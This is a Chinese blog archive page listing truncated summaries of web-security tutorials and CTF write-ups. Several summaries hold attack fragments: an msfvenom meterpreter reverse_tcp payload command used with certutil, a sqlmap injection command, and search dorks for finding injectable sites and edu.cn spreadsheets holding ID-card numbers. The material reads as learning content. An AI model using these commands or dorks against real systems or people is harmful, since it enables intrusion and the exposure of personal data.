10 2022 档案
摘要:原文链接:https://blog.csdn.net/weixin_45808483/article/details/121330374 一、题目 二、工具 使用XSS platform平台进行攻击 首先先注册,然后新建一个项目 我的项目,点击“创建” 填写项目信息,可以随意填写 然后选择如下的参数
阅读全文
摘要:原文来自:https://blog.csdn.net/weixin_52084568/article/details/123839776 sqlmap的使用方法(linux) sqlmap --version查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh查看sq
阅读全文
摘要:1.题目 2.使用的环境及工具 环境:kail linux 工具:sqlmap 3.操作步骤 本题是基于sql的注入,首先考虑sqlmap,先查看这个sql是否存在注入 ~~~sqlmap -u http://challenge-feaee1d753e60318.sandbox.ctfhub.com
阅读全文
摘要:poweshell是最稳定的一个工具点击文件名, certuil.exe 是作为证书服务的一部分安装的命令行程序,我们可以使用此工具在,目标计算机中执行恶意的exe文件以获得meterpreter会话。msfvenom -p windows/meterpreter/reverse_tcp|host=
阅读全文
摘要:metasploit 一、metasploit框架介绍 MSF是Metasploit Framework的简称。高度模块化,即框架由多个module组成,居家旅行必备神器。metasploit框架涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。渗透测试的一个过
阅读全文
摘要:什么是ARP欺骗ARP(地址解析协议),是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓
阅读全文
摘要:建议在安装EDR安全软件之前,卸载本机上的其他安全软件(含杀毒软件及安全卫士)。 一、安全软件下载 打开浏览器,在地址栏内输入: https://210.28.225.185/ui/web_install.html (如有风险提示请点击继续访问)。 根据自己设备操作系统选择相应安装包下载。如果不能正
阅读全文
摘要:第一步打开控制面板,点击管理工具 然后双击本地安全策略 点击IP安全策略 右击打开创建IP安全策略 根据这个IP安全策略向导操作 编辑新建的安全策略名称 不要勾选下面的激活默认响应规则,然后下一步 点击完成 选择新增的IP安全策略,右击打开属性 去掉勾选,使用添加向导 然后点击添加 然后继续点击添加
阅读全文
摘要:ip地址是唯一的吗? 同一局域网内唯一,广域网唯一。不同局域网内的重复的太多了。 什么是内网? 通俗的讲就是局域网,网吧、校园网、单位办公网都属于此类。另外光纤到楼、小区宽带、教育网、有线电视Cable Modem上网虽然地域范围比较大但本质上还是基于以太网技术,所以任然属于内网。 怎么判断我是不是
阅读全文
摘要:一、打开“控制面板” 二、点击系统和安全 三、点击Windows防火墙 四、点击“高级设置” 五、鼠标右击入站规则,点击新建规则 六、选择规则类型为自定义规则 七、选择所有程序或者某一个程序 八、默认协议类型,继续下一步 九、选择下列地址,根据自己需求点击添加 十、添加完成后,点击下一步,选择下面的
阅读全文
摘要:site:edu.cn filetype:xls 身份证 site:edu.cn inurl:admin SQL注入 sql常见特征:?id=1?xxx=xxx 1.利用搜索引擎搜索特征获取到sql注入漏洞例如:inurl:?id=1inurl:login.php2.利用已有的漏洞去探测同类型的网站
阅读全文
摘要:静态网页是网站建设的基础,早期的网站一般都是由静态网页制作的。静态网页是相对于动态网页而言,是指没有后台数据库、不含建站程序和不可交互的网页。静态网页相对更新起来比较麻烦,适用于一般更新较少的展示型网站。 容易误解的是静态页面都是htm这类页面,实际上静态也不是都静态,他也可以出现各种动态的效果,如
阅读全文
摘要:首先先聊一下重保是什么。重保是指在重大会议、节假日等特殊时期内,对目标系统进行现场安全值守和保障,对业务系统的安全状况进行实时监控和日志分析。重保通常的防护对象包括国家政府、国企、事业单位、金融企业、信息及通讯基础设施提供商、互联网企业、能源企业、有线上数字化内容的企业。在国庆等节假日、公司IPO前
阅读全文
摘要:变化一:高风险项成为“一票否决项”在“优、良、中”等级的判定依据中,“不会导致被测对象面临高风险项”是必要条件,任何存在高风险项的被测对象均直接判为“差”。变化二:高风险项的判定更为规范等级保护1.0对于高风险项没有明确的判定标准,但等级保护2.0以团体标准的形式对高风险项的判定标准进行了规定,为测
阅读全文
摘要:综合安全态势大屏:可展现全局的整体安全态势,包括“事前”资产态势、脆弱性态势、“事中”攻击态势以及“事后”安全事件态势等信息,同时也可以安全域的视角清晰地查看风险所在区域; 安全事件态势大屏,可监控内网发生安全事件情况,并对近期网络安全行业中的热点事件进行实时监控,快速感知内网安全状况; 网络攻击态
阅读全文
摘要:抓包就是将网络传输发送与接收的数据包进行截获、重发、编辑、转存等一系列操作,来进行检查网络是否安全。 常用的抓包工具: fiddler:windows平台最受欢迎抓包工具、免费、易用 charles:Mac平台下最佳抓包工具,易于使用,收费软件,可以一直使用 wireShark:老牌抓包工具,跨平台
阅读全文
摘要:API不是产品,而是战略,所有操作系统与网络操作系统都有API。在网络环境中不同机器的API兼容是必要的,否则程序对其所驻留的机器将是不兼容的。 bypass就是可以通过特定的触发状态(断电或死机)让两个网络不通过网络安全设备的系统,而直接物理上导通,所以有了Bypass后,当网络安全设备故障以后,
阅读全文
摘要:一共分为以下几个类 1.网络设备中的漏洞:snmp信息收集漏洞 SNMP协议被称为信息的金矿,经常被错误配置,如果可以通过SNMP的安全认证,则可以获取非常丰富的设备信息,且低版本SNMP报文以明文传输,容易被抓包分析。本文主要介绍SNMP的工作原理,以及利用其进行内网横向移动的常见方法。SNMP
阅读全文
摘要:反射型XSS,恶意代码是在URL中,只会执行一次,经过后端,但是不经过数据库,使用的时候url会发生改变。存储型,攻击者在数据中嵌入代码,经过后端,经过数据库。一直会存储在该网站中,查看改留言就会被攻击。常用的场景是网页留言和个人信息。攻击者发送恶意脚本给有漏洞的网站,漏洞的网站不知道这个是有问题的
阅读全文
